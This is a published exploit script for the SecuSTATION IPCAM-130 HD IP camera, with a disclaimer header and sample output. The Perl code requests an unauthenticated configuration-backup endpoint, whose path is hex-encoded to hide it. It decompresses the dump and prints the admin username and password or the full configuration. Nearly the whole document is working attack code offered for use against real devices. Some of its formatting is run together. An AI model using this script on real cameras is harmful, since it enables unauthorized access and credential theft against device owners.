# Exploit Title: SecuSTATION IPCAM-130 HD Camera - Remote Configuration Disclosure# Author: Todor Donev# Date: 2020-02-23# Vendor: https://secu.jp/# Product Link: https://secu.jp/support/831nh1.html# CVE: N/A##SecuSTATION IPCAM-130 HD Camera Remote Configuration Disclosure##Copyright 2020 (c) Todor Donev##https://donev.eu/##Disclaimer:#This or previous programs are for Educational purpose ONLY. Do not use it without permission. #The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages #caused by direct or indirect use of theinformation or functionality provided by these programs. #The author or any Internet providerbears NO responsibility for content or misuse of these programs #or any derivatives thereof. By using these programs you accept the factthat any damage (dataloss, #system crash, system compromise, etc.) caused by the useof these programs are not Todor Donev's #responsibility.# #Use them at your own risk!##(Dont do anything without permissions)## [ SecuSTATION IPCAM-130 HD Camera Remote Configuration Disclosure# [ ===============================================================# [ Exploit Author: Todor Donev 2020 <todor.donev@gmail.com># [ Initializing the browser# [ >>User-Agent => Mozilla/5.0 (compatible; Konqueror/3.5; NetBSD 4.0_RC3; X11) KHTML/3.5.7 (like Gecko)# [ >>Content-Type => application/x-www-form-urlencoded# [ <<Connection => close# [ <<Date => Fri, 21 Feb 2020 21:11:37 GMT# [ <<Accept-Ranges => bytes# [ <<Server => thttpd/2.25b 29dec2003# [ <<Content-Length => 32333# [ <<Content-Type => application/octet-stream# [ <<Last-Modified => Fri, 21 Feb 2020 21:11:36 GMT# [ <<Client-Date => Fri, 21 Feb 2020 21:12:23 GMT# [ <<Client-Peer => 192.168.100.200:81# [ <<Client-Response-Num => 1# [ # [ Username : admin# [ Password : admin#!/usr/bin/perl
use strict;
use HTTP::Request;
use LWP::UserAgent;
use WWW::UserAgent::Random;
use Gzip::Faster 'gunzip';
my $host = shift ||'';# Full path url to the store
my $cmd = shift ||'';# show - Show configuration dump
$host =~ s/\/$//;print"\033[2J";#clear the screenprint"\033[0;0H";#jump to 0,0print"[ SecuSTATION IPCAM-130 HD Camera Remote Configuration Disclosure\n";print"[ ===============================================================\n";print"[ Exploit Author: Todor Donev 2020 <todor.donev\@gmail.com>\n";if($host !~ m/^http/){print"[ Usage, Password Disclosure: perl $0 https://target:port/\n";print"[ Usage, Show Configuration : perl $0 https://target:port/ show\n";
exit;}print"[ Initializing the browser\n";
my $user_agent = rand_ua("browsers");
my $browser= LWP::UserAgent->new(protocols_allowed =>['http','https'],ssl_opts =>{ verify_hostname =>0});
$browser->timeout(30);
$browser->agent($user_agent);# my $target = $host."/tmpfs/config_backup.bin";
my $target = $host."\x2f\x77\x65\x62\x2f\x63\x67\x69\x2d\x62\x69\x6e\x2f\x68\x69\x33\x35\x31\x30\x2f\x62\x61\x63\x6b\x75\x70\x2e\x63\x67\x69";
my $request = HTTP::Request->new (GET => $target,[Content_Type =>"application/x-www-form-urlencoded"]);
my $response = $browser->request($request)or die "[ Exploit Failed: $!";print"[ >>$_ => ", $request->header($_),"\n"for$request->header_field_names;print"[ <<$_ => ", $response->header($_),"\n"for$response->header_field_names;print"[ Exploit failed! Not vulnerable.\n"and exit if($response->code ne 200);
my $gzipped = $response->content();
my $config = gunzip($gzipped);print"[ \n";if($cmd =~/show/){print"[ >> Configuration dump...\n[\n";print"[ ", $_,"\n"for split(/\n/,$config);
exit;}else{print"[ Username : ", $1,"\n"if($config =~/username=(.*)/);print"[ Password : ", $1,"\n"if($config =~/password=(.*)/);
exit;}
